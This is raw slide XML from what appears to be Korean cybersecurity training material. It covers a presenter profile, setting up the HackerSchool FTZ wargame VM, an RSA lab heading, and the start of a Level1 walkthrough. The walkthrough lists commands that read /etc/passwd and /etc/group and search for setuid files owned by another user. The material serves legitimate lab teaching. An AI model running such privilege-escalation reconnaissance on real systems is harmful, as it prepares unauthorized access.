            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="타원 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{625FE651-843B-4791-9816-708A8A1B4DC8}"/>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4" name="타원 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA13668D-C4B1-461B-852B-0479BBAAC041}"/>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6" name="타원 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A09A6BE-9B2D-4B84-896B-437FB5407800}"/>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9" name="TextBox 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00995CA4-CE81-4119-A34F-680C72211655}"/>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a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="21" name="직선 화살표 연결선 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A56FD550-84D0-43D9-B504-B6F60E2967C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="16"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5CC17BEA-5D87-426A-AC11-0455D9C2BED0}"/>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24" name="TextBox 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{221F3A6E-7E4A-47F6-B7FA-AD2EF7E6AD1D}"/>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25" name="직선 화살표 연결선 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5CA07F16-F577-444C-824B-64C0CB228CB3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="23"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63191A7F-43F0-4D9A-8C12-38C26ADBE410}"/>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0" name="TextBox 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2F635E5-C3DB-4E01-B0B8-3F9DED11E2BF}"/>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31" name="직선 화살표 연결선 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CDA39363-128D-4C8D-9894-8F6319F33693}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="29"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D6718D96-D0D2-4F8D-8E3C-10E0653667E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6539858" y="5332367"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="TextBox 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C57A4A9-5E25-46C6-98EC-39B35AE8B86E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5496875" y="4328574"/>
            <a:ext cx="2505066" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>고려대학교 정보보호대학원</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>석사과정</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="34" name="직선 화살표 연결선 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23A6D836-0DFE-468D-A267-53364D599956}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="32" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6679817" y="4931217"/>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BD32D985-F3F4-41DC-B457-850D87688A1C}"/>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6" name="TextBox 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16436C3A-6EF7-4DCC-AD72-76FBEC62D1D7}"/>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37" name="직선 화살표 연결선 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{267412FC-1A9B-4228-BB35-831DDF997D07}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="35"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BECE8CBF-704B-4098-9038-19C03F30A5E7}"/>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3" name="TextBox 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB8E55D0-984F-46DC-969A-BD0DF20DBA6E}"/>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44" name="직선 화살표 연결선 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93902757-49CE-4253-9EC4-ABB63C9345EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="42"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E9A2666-7E35-416F-BBE5-E794D31E2A89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7439555" y="1810799"/>
            <a:ext cx="3229307" cy="1666546"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="85000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>이름 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>백도우</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>계급 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400"/>
              <a:t>대위</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>나이 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400"/>
              <a:t>: 28</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>병과 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>정통</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>직책 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400"/>
              <a:t>교수부 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" err="1"/>
              <a:t>이학처</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400"/>
              <a:t> 사이버과학과</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="그림 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3AC8A2A-027B-4D07-8289-7DD20F673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2014" y="1824575"/>
            <a:ext cx="1287541" cy="1655410"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="타원 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DAA7FED8-C31F-4531-AC25-E86DB731BDB0}"/>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39" name="타원 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84479684-3B6A-4A99-B67D-8BD7B1066C11}"/>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0" name="TextBox 39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A35C76A9-D8D1-4DD3-A102-53A1789FFA25}"/>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1" name="직선 화살표 연결선 40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07F38A4C-BE69-4E52-B701-DBEDE8C8C4F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="39"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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="50" name="그룹 49">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B7A0603-229C-4E9D-8BCB-2A63AD79F49C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11593737" y="6457890"/>
            <a:ext cx="678993" cy="400110"/>
            <a:chOff x="10627762" y="-30288"/>
            <a:chExt cx="597159" cy="400110"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="51" name="사각형: 둥근 모서리 50">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38F448C0-C5C8-499B-B96A-291D7F8127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TextBox 51">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F2131B6-A8D1-4C83-B9B4-356DF075172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53" name="화살표: 오른쪽 52">
              <a:hlinkClick r:id="rId4" action="ppaction://hlinksldjump"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E24709AD-D754-4282-B699-7176AD277D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2923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/Environ/HackerSchool</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>HackerSchool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> FTZ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hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>해커스쿨 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>FTZ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>이미지 파일  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>접속</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> -&gt; download </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>클릭  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>-&gt;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두개의 파일이 있음</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>ftz.iso</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>와 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, Vmware_Redhat_9_FTZ.Zip  -&gt;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압축을 풀면</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, Red Hat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>Linux.vmx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일이 있음</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>. -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>해당 파일 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>더블클릭하여</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>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VMware </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>을 처음 사용한다면</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>,  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>‘Use VMware Workstation 16 Player for free for non-commercial use’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>클릭</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>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A717927E-3029-4192-BDFE-07162D4A32EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="507722" y="2209891"/>
            <a:ext cx="5385591" cy="1410309"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="292100" dist="139700" dir="2700000" algn="tl" rotWithShape="0">
              <a:srgbClr val="333333">
                <a:alpha val="65000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="직사각형 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3B50932-C69C-4B3B-BC38-CF7FC1B4BE16}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5097982" y="2985961"/>
            <a:ext cx="404602" cy="218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 name="그림 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F024F418-AC00-4697-9B10-8AF3A9152791}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1880808" y="4248726"/>
            <a:ext cx="3419475" cy="1924050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="25" name="그림 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26F3A773-EE78-415B-A1CA-096EC0266DAC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId7"/>
          <a:srcRect r="7909" b="27147"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6656924" y="2364905"/>
            <a:ext cx="4089299" cy="1064095"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="27" name="그림 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB4A787E-3817-4666-8466-DB8326ADE240}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7574244" y="4129281"/>
            <a:ext cx="2662182" cy="2200337"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3696214040"/>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1819957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71487235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199181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en-US" altLang="ko-KR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>현대암호 실습 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>– RSA</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6183124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0257225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559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139006-5E21-45FB-91D8-84C2FCE57E4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8210D1F-6621-4374-A2B3-21A9DB5AD646}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="그룹 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B3BA3D6-604E-4F31-99FC-E7D76DF2070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EA36AF07-597D-488B-9B08-51E2C00AA8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A4759FDB-3683-49A4-83E9-1AB3D58CC31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7" name="화살표: 오른쪽 6">
              <a:hlinkClick r:id="rId2" action="ppaction://hlinksldjump"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2932A84-AAA4-407D-A901-161A39D38D8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740377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a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>해커스쿨 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>FTZ</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103495138"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1814222" y="1953081"/>
          <a:ext cx="9093843" cy="3931483"/>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setuid</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t> 란 무엇인가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23023121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cut –f1 –d: /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/passwd</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>cut –f1 –d: /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/group</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>find / -user level4 –perm -4000 2&gt;/dev/null</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>logout</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201973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/Training/FTZ/1</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>  Level1</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level1</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level1 / level1</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816619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4"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>‘I Copied It’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>클릭 한 후 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>분간 기다림</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r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>부팅이 완료되어 다음과 같은 화면이 나오면 설치완료</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>된것</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
